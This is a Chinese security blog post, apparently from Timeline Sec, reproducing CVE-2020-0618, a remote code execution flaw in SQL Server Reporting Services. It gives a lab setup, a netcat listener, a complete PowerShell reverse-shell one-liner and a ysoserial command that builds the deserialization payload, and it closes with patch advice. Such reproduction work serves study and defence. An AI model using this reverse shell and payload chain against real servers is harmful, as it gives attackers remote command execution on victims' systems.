首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >CVE-2020-0618:SQL Server 远程代码执行复现

CVE-2020-0618:SQL Server 远程代码执行复现

作者头像
Timeline Sec
发布于 2020-04-27 02:18:19
发布于 2020-04-27 02:18:19
2.3K00
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:0
代码可运行

本文作者:daxi0ng(团队核心成员)

本文字数:1072

阅读时长:2~3min

声明:请勿用作违法用途,否则后果自负

0x01 简介

2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。

0x02 漏洞概述

获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。

0x03 影响版本

SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE) SQL Server 2012 for x64-based Systems Service Pack 4 (QFE) SQL Server 2014 Service Pack 3 for 32-bit Systems (CU) SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR) SQL Server 2014 Service Pack 3 for x64-based Systems (CU) SQL Server 2014 Service Pack 3 for x64-based Systems (GDR) SQL Server 2016 for x64-based Systems Service Pack 1 SQL Server 2016 for x64-based Systems Service Pack 2 (CU) SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)

0x04 环境搭建

1、安装Windows server 2016 Standard

2、安装Sql Server 2016,其中有几个点需要注意

一路默认安装下来。注意功能选择的时候需要选择"数据库引擎服务"和"Reporting Services"服务

这里用混合模式创建账号 账号sa 密码123qweQWE 便于后面连接报表服务器

又是一路默认,安装完成

3、重点来了!访问 http://localhost/ReportS,创建分页报表,提示需要安装报表服务器

4、安装好报表服务器后,新建一个报表此时就用到了我们前面设置的账号密码 sa/123qweQWE

保存一下,然后点击运行

访问一下漏洞路径,Success!

0x05 漏洞复现

1、使用Netcat监听1888端口,便于后续接受反弹回来的Shell(WIN+Rpowshell)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cd .\Desktop\netcat-1.11_1\.\nc.exe -lvp 1888

2、点击桌面的postman,send

3、此时Shell已经弹回,使用 whoami 命令可以看到Shell的用户是 nt service\reportservice

PS:(此步可省略) 以上是我已经生成了验证POC,想要自己生成POC可以使用powershell打开ysoserial.exe工具生成有效负载,执行完最后一步的时候payload已经存在于剪切板。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$command = '$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",1888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

0x06 修复方式

目前微软官方已针对受支持的版本发布了修复该漏洞的安全补丁,请受影响的用户尽快安装补丁进行防护。

官方下载链接:

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0618

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告
2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。
绿盟科技安全情报
2020/02/24
1K0
【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告
SQL Server Reporting Services(CVE-2020-0618)中的RCE
SQL Server Reporting Services(SSRS)提供了一组本地工具和服务,用于创建,部署和管理移动报告和分页报告.
洛米唯熊
2020/02/25
1.9K0
SQL Server Reporting Services(CVE-2020-0618)中的RCE
Microsoft Office 远程代码执行
昨天大哥扔了个MS office 0day(CVE-2022-30190)的截图到群里,晚上就复现了一下 ,随即有了下文 。
Gamma实验室
2022/08/30
7200
Microsoft Office 远程代码执行
【漏洞预警】微软远程桌面服务远程代码执行漏洞(CVE-2019-1181&CVE-2019-1182)预警通告
北京时间2019年8月14日,微软发布了一系列远程桌面服务修复方案及补丁,其中包含2个严重的远程代码执行漏洞CVE-2019-1181和 CVE-2019-1182。类似此前修复的“BlueKeep”漏洞 (CVE-2019-0708),此次通告的漏洞具有蠕虫特性,攻击者不需要与用户交互,即可在目标系统上执行任意代码,传播蠕虫病毒。 本次安全更新通过更正远程桌面服务处理连接请求的方式来解决此漏洞,请用户尽快安装更新补丁,对此次通告漏洞进行修复。
绿盟科技安全情报
2019/10/24
7500
安全通告 | Windows DNS服务器远程执行代码漏洞风险通告(CVE-2020-1350)
近日,腾讯安全云鼎实验室监测到,微软于周二发布了一个存在17年之久的蠕虫级安全漏洞(代号: SIGRed ,漏洞编号CVE-2020-1350),漏洞被利用可导致 Windows DNS服务器中的严重远程执行代码(RCE) 。 为避免您的业务受影响,腾讯安全云鼎实验室建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 2020年7月15日,微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞,官方分类为“蠕虫级”高危漏洞,漏洞有可能通过恶意软件在
云鼎实验室
2020/07/16
1.2K0
【漏洞通告】Windows TCP/IP 远程代码执行漏洞(CVE-2021-24074)
2月10日,绿盟科技监测到微软在2月的补丁更新中修复了Windows TCP/IP远程代码执行漏洞(CVE-2021-24074),该漏洞位于IPv4源路由中,Windows默认配置下不启用此功能,攻击者可通过构造特殊的IP数据包,在目标主机上远程执行任意代码。CVSS评分为9.8,影响系统广泛,请相关用户更新补丁进行防护。
绿盟科技安全情报
2021/03/03
1K0
【漏洞通告】Windows TCP/IP 远程代码执行漏洞(CVE-2021-24074)
【漏洞通告】微软Type 1字体分析远程执行代码漏洞通告
3月24日,微软发布了编号为ADV200006的安全通告,通告指出Adobe Type Manager Library在处理multi-master字体(Adobe Type 1 PostScript格式)时存在缺陷,攻击者可以精心构造恶意文档并诱使用户使用Windows Preview pane预览,从而利用该漏洞来远程执行代码。
绿盟科技安全情报
2020/04/07
1.2K0
CVE-2022-22718:Windows Print Spooler提权
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7
Al1ex
2023/05/12
6520
CVE-2022-22718:Windows Print Spooler提权
【安全通告】2022年1月“微软补丁日” 高危远程代码执行漏洞风险通告
腾讯云安全运营中心监测到, 微软发布了2022年1月的例行安全更新公告,共涉及漏洞数122个,其中严重级别漏洞9个,重要级别89个。本次发布涉及 Microsoft Windows,Microsoft Edge, Exchange Server, Microsoft Office , SharePoint Server, .NET Framework, Microsoft Dynamics, Windows Hyper-V, Windows Defender 等多个软件的安全更新。 为避免您的业务受影响,腾
云鼎实验室
2022/01/12
2.1K0
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
伍尚国
2018/09/11
9840
【漏洞通告】Windows DNS服务器远程代码执行漏洞(CVE-2020-1350)通告
7月15日,微软发布7月安全更新补丁,其中修复了一个Windows DNS服务器远程代码执行漏洞(CVE-2020-1350),代号为SigRed,此漏洞已存在17年之久,CVSS评分为10。默认配置下,未经验证的攻击者可以向 Windows DNS 服务器发送恶意请求来利用此漏洞。
绿盟科技安全情报
2020/07/17
1.6K0
社工钓鱼之Office钓鱼(上)
CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码,FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码
Al1ex
2023/05/26
7010
社工钓鱼之Office钓鱼(上)
CVE-2021-1675 Windows Print Spooler RCE EXP
让我们检查一下关于 RpcAddPrinterDriver 调用的 MS-RPRN:打印系统远程协议。
Khan安全团队
2021/07/08
1.3K0
CVE-2021-1675 Windows Print Spooler RCE EXP
高危漏洞预警更新!8月Windows RDS漏洞(CVE-2019-1181,CVE-2019-1182)
远程桌面服务(Remote Desktop Services )高危漏洞,攻击者可以利用该漏洞在无需用户交互的情况下实现蠕虫攻击或攻击指定服务器。腾讯安全团队自该漏洞安全公告发布之后,第一时间予以关注。通过研究,腾讯安全团队已构造出POC,目前可稳定重现漏洞。
墙角睡大觉
2019/09/24
7860
【漏洞通告】微软5月安全更新多个产品高危漏洞通告
北京时间5月13日,微软发布5月安全更新补丁,修复了111个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge、.NET Framework、Microsoft Office、Visual Studio等广泛使用的产品,其中包括特权提升和远程代码执行等高危漏洞类型。
绿盟科技安全情报
2020/05/25
1.1K0
【漏洞预警】Windows NTLM篡改漏洞(CVE-2019-1040)预警通告
北京时间6月12日,微软官方发布了Windows NTLM篡改漏洞(CVE-2019-1040)的修复补丁,该漏洞存在于Windows操作系统中,攻击者利用此漏洞可绕过NTLM MIC的防护机制。
绿盟科技安全情报
2019/10/24
1.2K0
【漏洞预警】Windows NTLM篡改漏洞(CVE-2019-1040)预警通告
【安全更新】微软3月多个产品高危漏洞通告
北京时间3月10日,微软发布3月安全更新补丁,修复了89个安全问题,涉及Microsoft Windows、Microsoft Office、Microsoft Exchange Server、Internet Explorer、Visual Studio等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/03/18
7940
【安全更新】微软3月多个产品高危漏洞通告
【安全更新】微软1月安全更新多个产品高危漏洞通告
北京时间1月13日,微软发布1月安全更新补丁,修复了83个安全问题,涉及Microsoft Windows、Microsoft Office、Microsoft SQL Server、Visual Studio、Microsoft Defender等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/01/18
1.4K0
[漏洞复现] 二.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
最近开始学习网络安全和系统安全,接触到了很多新术语、新方法和新工具,作为一名初学者,感觉安全领域涉及的知识好广、好杂,但同时也非常有意思。这系列文章是作者学习安全过程中的总结和探索,我们一起去躺过那些坑、跨过那些洞、守住那些站,真心希望文章对您有所帮助,感谢您的阅读和关注。
Gcow安全团队
2020/09/04
12.4K1
[漏洞复现] 二.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
【漏洞通告】微软6月安全更新多个产品高危漏洞通告
北京时间6月10日,微软发布6月安全更新补丁,修复了130个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge、Windows Defender、Microsoft Office、Visual Studio、Adobe Flash Player等广泛使用的产品,其中包括内存泄露和远程代码执行等高危漏洞类型。
绿盟科技安全情报
2020/06/15
1.2K0
推荐阅读
相关推荐
【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验